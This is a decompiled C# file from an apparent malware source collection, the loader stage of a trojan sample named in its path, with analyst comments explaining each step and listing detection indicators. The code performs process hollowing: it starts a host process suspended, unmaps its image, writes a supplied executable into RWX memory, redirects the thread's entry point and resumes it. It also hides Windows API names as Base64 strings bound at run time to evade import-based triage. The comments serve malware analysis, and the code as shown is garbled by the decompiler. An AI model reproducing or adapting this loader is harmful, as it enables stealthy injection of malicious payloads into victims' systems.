MalwareSourceCode/MSIL/Trojan/Win32/J/Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881/uqeyrwlquci0gyeo0qjxqcszc.cs

// Decompiled with JetBrains decompiler
// Type: uqeyrwlquci0gyeo0qjxqcszc
// Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null
// MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe
using System;
using System.Reflection;
using System.Reflection.Emit;
using System.Runtime.InteropServices;
/// <summary>
/// Decompiled loader stage of the sample named in the header above. The call sequence
/// (create a process suspended, unmap its image, allocate and write a supplied PE into
/// it, rewrite the main thread's context, resume) matches process hollowing
/// (MITRE ATT&amp;CK T1055.012).
/// </summary>
/// <remarks>
/// Analyst notes:
/// - This is raw decompiler output and does not compile as shown: four pinned pointers
///   were all emitted under the single name <c>numPtr</c> (see the "ISSUE" markers), so
///   which buffer each dereference targets has to be inferred from the offsets used.
/// - Native API names are not present in the assembly's import metadata. They are held
///   as string literals passed through <c>ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r</c>
///   (defined outside this file; presumably a Base64 decoder, since every literal is
///   valid Base64) and bound at run time through Reflection.Emit.
/// - Static indicators visible here: the Base64 literals themselves, a dynamic assembly
///   named "temp", and the use of <c>ModuleBuilder.DefinePInvokeMethod</c>.
/// - Behavioural indicators visible here: a child process created with CREATE_SUSPENDED,
///   a section unmap and PAGE_EXECUTE_READWRITE allocation in that child, cross-process
///   memory writes, a thread-context change, then a thread resume.
/// - Pointer values are cast to 32-bit ints and the NT-header buffer is 248 bytes, so
///   the code appears to assume a 32-bit image and host process (verify on the binary).
/// </remarks>
public static class uqeyrwlquci0gyeo0qjxqcszc
{
// Win32/PE constants. The method body below uses the equivalent numeric literals
// rather than these names (the decompiler inlined them).
// 65543 = 0x00010007
private const uint CONTEXT_FULL = 65543;
// Process creation flag; appears as the literal 4 in the CreateProcess call.
private const int CREATE_SUSPENDED = 4;
// 4096 = 0x1000
private const int MEM_COMMIT = 4096;
// 8192 = 0x2000; MEM_COMMIT | MEM_RESERVE is the literal 12288 used below.
private const int MEM_RESERVE = 8192;
// 64 = 0x40; read/write/execute page protection, a common detection signal when
// requested for memory in another process.
private const int PAGE_EXECUTE_READWRITE = 64;
// 23117 = 0x5A4D, the "MZ" DOS header magic.
private const ushort IMAGE_DOS_SIGNATURE = 23117;
// 17744 = 0x00004550, the "PE\0\0" NT header magic.
private const uint IMAGE_NT_SIGNATURE = 17744;
/// <summary>
/// Validates <paramref name="exeBuffer"/> as a PE image, starts
/// <paramref name="hostProcess"/> suspended and replaces its image with the buffer's
/// contents before resuming its main thread.
/// </summary>
/// <param name="exeBuffer">Raw bytes of the PE image to place into the new process.</param>
/// <param name="hostProcess">Passed as the application name of the process to create.</param>
/// <param name="optionalArguments">If non-empty, appended to <paramref name="hostProcess"/> to form the command line.</param>
/// <returns>
/// <c>false</c> if either header signature check fails or the process-creation call
/// returns false; otherwise <c>true</c>. The results of the later native calls are
/// stored in unused locals or discarded, so <c>true</c> does not prove they succeeded.
/// </returns>
public static unsafe bool Vbm2knor525p1x3t5q2zsdbhh(
byte[] exeBuffer,
string hostProcess,
string optionalArguments)
{
// Scratch buffers. Sizes suggest: 40 = one section header, 248 = 32-bit NT headers,
// 64 = DOS header, int[4] = process-information output, 716 = 32-bit thread CONTEXT.
// NOTE(review): roles inferred from sizes and later use; confirm against the IL.
byte[] dst1 = new byte[40];
byte[] dst2 = new byte[248];
byte[] dst3 = new byte[64];
int[] numArray1 = new int[4];
byte[] numArray2 = new byte[716];
// Decompiler artifact: each buffer is pinned to a pointer, but all four pointers were
// emitted as `numPtr` with empty bodies, so every later `numPtr` is ambiguous.
fixed (byte* numPtr = &dst1[0])
;
fixed (byte* numPtr = &dst2[0])
;
fixed (byte* numPtr = &dst3[0])
;
fixed (byte* numPtr = &numArray2[0])
;
// Writes 65543 (CONTEXT_FULL) at offset 0; presumably the flags field of the
// 716-byte context buffer.
// ISSUE: fixed variable is out of scope
*(int*) numPtr = 65543;
// First 64 bytes of the input are copied into dst3 and checked for the "MZ" magic.
Buffer.BlockCopy((Array) exeBuffer, 0, (Array) dst3, 0, dst3.Length);
// ISSUE: fixed variable is out of scope
if (*(ushort*) numPtr != (ushort) 23117)
return false;
// Offset 60 of the DOS header holds the file offset of the NT headers (e_lfanew).
// ISSUE: fixed variable is out of scope
int srcOffset = *(int*) (numPtr + 60);
// 248 bytes from that offset are copied into dst2 and checked for the "PE\0\0" magic.
Buffer.BlockCopy((Array) exeBuffer, srcOffset, (Array) dst2, 0, dst2.Length);
// ISSUE: fixed variable is out of scope
if (*(uint*) numPtr != 17744U)
return false;
// Command line: starts from the helper's output for "" and becomes
// "<hostProcess> <optionalArguments>" only when arguments were supplied.
string str = ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("");
if (!string.IsNullOrEmpty(optionalArguments))
str = hostProcess + " " + optionalArguments;
// Literals decode (as Base64) to "kernel32" / "CreateProcess". The sixth argument, 4,
// is CREATE_SUSPENDED. The 68-byte array is presumably the startup-info structure and
// numArray1 receives the process information; [0] is later used as the process
// handle and [1] as the thread handle.
if (!uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<bool>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("Q3JlYXRlUHJvY2Vzcw=="), new Type[10]
{
typeof (string),
typeof (string),
typeof (IntPtr),
typeof (IntPtr),
typeof (bool),
typeof (int),
typeof (IntPtr),
typeof (string),
typeof (byte[]),
typeof (int[])
}, (object) hostProcess, (object) str, (object) IntPtr.Zero, (object) IntPtr.Zero, (object) false, (object) 4, (object) IntPtr.Zero, null, (object) new byte[68], (object) numArray1))
return false;
// Offset 52 of 32-bit NT headers is the preferred image base (presumably read from dst2).
// ISSUE: fixed variable is out of scope
IntPtr num1 = new IntPtr(*(int*) (numPtr + 52));
// Literals decode to "ntdll" / "NtUnmapViewOfSection": unmaps whatever is mapped at
// that base address in the new process. The status in num2 is never checked.
int num2 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRVbm1hcFZpZXdPZlNlY3Rpb24="), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) num1);
// Literals decode to "kernel32" / "VirtualAllocEx": requests memory in the new process
// at the image base with 12288 (MEM_COMMIT | MEM_RESERVE) and 64
// (PAGE_EXECUTE_READWRITE). Offset 80 of the NT headers is the image size.
// If the allocation fails the method calls itself again with the same arguments,
// ignores that call's result and continues; each retry creates another suspended
// process, and nothing visible here terminates the earlier one.
// ISSUE: fixed variable is out of scope
if (uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<IntPtr>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("VmlydHVhbEFsbG9jRXg="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (uint),
typeof (int),
typeof (int)
}, (object) (IntPtr) numArray1[0], (object) num1, (object) *(uint*) (numPtr + 80), (object) 12288, (object) 64) == IntPtr.Zero)
uqeyrwlquci0gyeo0qjxqcszc.Vbm2knor525p1x3t5q2zsdbhh(exeBuffer, hostProcess, optionalArguments);
// Literals decode to "ntdll" / "NtWriteVirtualMemory": writes the start of exeBuffer
// to the image base in the new process. The length comes from offset 84, which in
// 32-bit NT headers is the size of the PE headers.
fixed (byte* numPtr = &exeBuffer[0])
{
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (IntPtr),
typeof (uint),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) num1, (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 84), (object) IntPtr.Zero);
}
// Loop bound is read from offset 6, the section count in 32-bit NT headers.
// ISSUE: fixed variable is out of scope
for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index)
{
// Loads the index-th 40-byte section header, located right after the NT headers.
Buffer.BlockCopy((Array) exeBuffer, srcOffset + dst2.Length + dst1.Length * (int) index, (Array) dst1, 0, dst1.Length);
// Section header offsets used below: 20 = file offset of the raw data,
// 12 = virtual address, 16 = raw data size.
// ISSUE: fixed variable is out of scope
fixed (byte* numPtr = &exeBuffer[(IntPtr) *(uint*) (numPtr + 20)])
{
// "ntdll" / "NtWriteVirtualMemory": writes this section's raw bytes to
// image base + virtual address in the new process.
// ISSUE: fixed variable is out of scope
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (IntPtr),
typeof (uint),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) ((long) (int) num1 + (long) *(uint*) (numPtr + 12)), (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 16), (object) IntPtr.Zero);
}
}
// "ntdll" / "NtGetContextThread": reads the suspended thread's context, presumably
// into the 716-byte buffer.
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRHZXRDb250ZXh0VGhyZWFk"), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
// "ntdll" / "NtWriteVirtualMemory" with a length of 4: the destination address is the
// value at offset 172 of a buffer (presumably the context) and the value passed as
// the source is num1, the image base.
// NOTE(review): the pointer and argument roles here are garbled by the decompiler;
// confirm against the IL before relying on this description.
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (IntPtr),
typeof (int),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) (long) *(uint*) (numPtr + 172), (object) num1, (object) 4, (object) IntPtr.Zero);
// Stores image base + the value at offset 40 (the entry-point RVA in 32-bit NT
// headers) at offset 176, presumably a register slot of the context buffer.
// ISSUE: fixed variable is out of scope
// ISSUE: fixed variable is out of scope
*(int*) (numPtr + 176) = (int) num1 + (int) *(uint*) (numPtr + 40);
// "ntdll" / "NtSetContextThread": applies the modified context to the suspended thread.
// ISSUE: fixed variable is out of scope
int num3 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRTZXRDb250ZXh0VGhyZWFk"), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
// "ntdll" / "NtResumeThread": resumes the thread. num3 and num4 are never inspected.
int num4 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRSZXN1bWVUaHJlYWQ="), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[1], (object) IntPtr.Zero);
return true;
}
/// <summary>
/// Builds a P/Invoke stub at run time for one native export and invokes it once.
/// Because the binding is created through Reflection.Emit, the library and export
/// names never appear in this assembly's static P/Invoke metadata; import-table or
/// ImplMap-based triage will not list the APIs used by this class.
/// </summary>
/// <typeparam name="TR">Managed return type declared for the native function.</typeparam>
/// <param name="name">Native library name, passed as the DLL name of the stub.</param>
/// <param name="method">Export name, also used as the name of the generated method.</param>
/// <param name="typeArr">Managed parameter types of the generated signature.</param>
/// <param name="arguments">Values passed to the native function.</param>
/// <returns>The native call's return value, cast to <typeparamref name="TR"/>.</returns>
public static TR Ym0011n1sqree12pbi2kviopbv04c0hwt<TR>(
string name,
string method,
Type[] typeArr,
params object[] arguments)
{
// A new run-only dynamic assembly named "temp" is defined on every call; the module
// name literal decodes (as Base64) to "module".
ModuleBuilder moduleBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("temp"), AssemblyBuilderAccess.Run).DefineDynamicModule(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bW9kdWxl"));
// Declares a public static global P/Invoke method with Winapi calling convention and
// ANSI string marshalling; PreserveSig keeps the native return value as-is.
moduleBuilder.DefinePInvokeMethod(method, name, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, typeof (TR), typeArr, CallingConvention.Winapi, CharSet.Ansi).SetImplementationFlags(MethodImplAttributes.PreserveSig);
moduleBuilder.CreateGlobalFunctions();
// Looks the stub up by name and calls it reflectively with the supplied arguments.
return (TR) moduleBuilder.GetMethod(method).Invoke((object) null, arguments);
}
}